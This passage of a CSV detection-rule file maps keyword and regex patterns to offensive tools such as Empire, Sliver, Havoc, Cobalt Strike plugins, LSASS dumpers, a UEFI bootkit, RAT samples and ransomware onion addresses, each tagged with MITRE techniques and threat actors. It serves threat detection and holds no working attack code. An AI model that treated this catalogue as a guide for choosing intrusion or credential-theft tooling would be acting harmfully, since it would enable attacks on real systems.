BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55537"
"*ProcessSuperPuTTYFile*",".{0,1000}ProcessSuperPuTTYFile.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55538"
"*Process-TaskingPackets*",".{0,1000}Process\-TaskingPackets.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1059","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55539"
"*ProcessThoroughLocal*",".{0,1000}ProcessThoroughLocal.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55540"
"*ProcessThoroughRemote*",".{0,1000}ProcessThoroughRemote.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55541"
"*Processus-Thief/HEKATOMB*",".{0,1000}Processus\-Thief\/HEKATOMB.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","N/A","10","","N/A","","","","55542"
"*ProcessWinSCPLocal*",".{0,1000}ProcessWinSCPLocal.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55543"
"*ProcHideClient.exe -*",".{0,1000}ProcHideClient\.exe\s\-.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","55544"
"*ProcHideDrv_x64.sys*",".{0,1000}ProcHideDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","55545"
"*ProcProtectClient.exe *",".{0,1000}ProcProtectClient\.exe\s.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","55546"
"*'Product'>CheckPort*",".{0,1000}\'Product\'\>CheckPort.{0,1000}","offensive_tool_keyword","CheckPort","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","CheckPort","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","55549"
"*'Product'>CheckPort*",".{0,1000}\'Product\'\>CheckPort.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","CheckPort","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","55550"
"*'Product'>ForgeCert*",".{0,1000}\'Product\'\>ForgeCert.{0,1000}","offensive_tool_keyword","ForgeCert","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","ForgeCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","55551"
"*'Product'>ForgeCert*",".{0,1000}\'Product\'\>ForgeCert.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","ForgeCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","55552"
"*'Product'>RunasCs<*",".{0,1000}\'Product\'\>RunasCs\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","RunasCs","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","55554"
"*'Product'>RunasCs<*",".{0,1000}\'Product\'\>RunasCs\<.{0,1000}","offensive_tool_keyword","RunasCs","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","RunasCs","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","55555"
"*'Product'>SharpMove*",".{0,1000}\'Product\'\>SharpMove.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpMove","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","55556"
"*'Product'>SharpMove*",".{0,1000}\'Product\'\>SharpMove.{0,1000}","offensive_tool_keyword","SharpMove","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","SharpMove","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","55557"
"*profiles generate --save *",".{0,1000}profiles\sgenerate\s\-\-save\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","55563"
"*profiles new beacon *",".{0,1000}profiles\snew\sbeacon\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","55564"
"*profiles new --mtls *",".{0,1000}profiles\snew\s\-\-mtls\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","55565"
"*profiles/havoc.yaotl*",".{0,1000}profiles\/havoc\.yaotl.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","55566"
"*ProgIDsUACBypass.*",".{0,1000}ProgIDsUACBypass\..{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","55567"
"*Program Rat V1.0 By Black Sinper*",".{0,1000}Program\sRat\sV1\.0\sBy\sBlack\sSinper.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","55588"
"*Program.MiniDump minidump*",".{0,1000}Program\.MiniDump\sminidump.{0,1000}","offensive_tool_keyword","DumpNParse","A Combination LSASS Dumper and LSASS Parser","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/icyguider/DumpNParse","1","0","#content","N/A","10","2","150","24","2021-11-21T14:25:24Z","2021-11-21T14:18:42Z","55589"
"*program/replay.pl*",".{0,1000}program\/replay\.pl.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/sullo/nikto","1","1","#linux","N/A","N/A","10","9184","1306","2025-02-22T14:30:28Z","2012-11-24T04:24:29Z","55590"
"*projectb-temp/mimidogz*",".{0,1000}projectb\-temp\/mimidogz.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","55602"
"*promethw27cbrcot.onion*",".{0,1000}promethw27cbrcot\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","55604"
"*PromptCreds_x64.dll*",".{0,1000}PromptCreds_x64\.dll.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","55606"
"*PromptCreds_x86.dll*",".{0,1000}PromptCreds_x86\.dll.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","55607"
"*prosody2john.py*",".{0,1000}prosody2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","55608"
"*ProtectMyToolingGUI.pyw*",".{0,1000}ProtectMyToolingGUI\.pyw.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","55609"
"*ProtectMyTooling-master.zip*",".{0,1000}ProtectMyTooling\-master\.zip.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","55610"
"*Protocol/EfiGuard.h*",".{0,1000}Protocol\/EfiGuard\.h.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","55611"
"*protonvpnstealer*",".{0,1000}protonvpnstealer.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","55613"
"*Provided that the current user has the SeImpersonate privilege, this tool will have an escalation to SYSTEM*",".{0,1000}Provided\sthat\sthe\scurrent\suser\shas\sthe\sSeImpersonate\sprivilege,\sthis\stool\swill\shave\san\sescalation\sto\sSYSTEM.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","55614"
"*Provides an unstoppable Windows Service Experience. Lorem Ipsum Dolor*",".{0,1000}Provides\san\sunstoppable\sWindows\sService\sExperience\.\sLorem\sIpsum\sDolor.{0,1000}","offensive_tool_keyword","UnstoppableService","a Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interface","T1543.003 - T1564.001 - T1490","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/malcomvetter/UnstoppableService","1","0","#content","service name description","5","1","66","15","2019-01-19T22:38:18Z","2018-08-07T22:11:22Z","55616"
"*prowler gcp --credentials-file path*",".{0,1000}prowler\sgcp\s\-\-credentials\-file\spath.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55617"
"*proxmark3 -p /dev/ttyACM0*",".{0,1000}proxmark3\s\-p\s\/dev\/ttyACM0.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55618"
"*Proxy bypass enabled for Neo4j connection*",".{0,1000}Proxy\sbypass\senabled\sfor\sNeo4j\sconnection.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","#linux #content","N/A","10","6","545","54","2024-11-14T13:07:54Z","2022-09-07T13:34:30Z","55619"
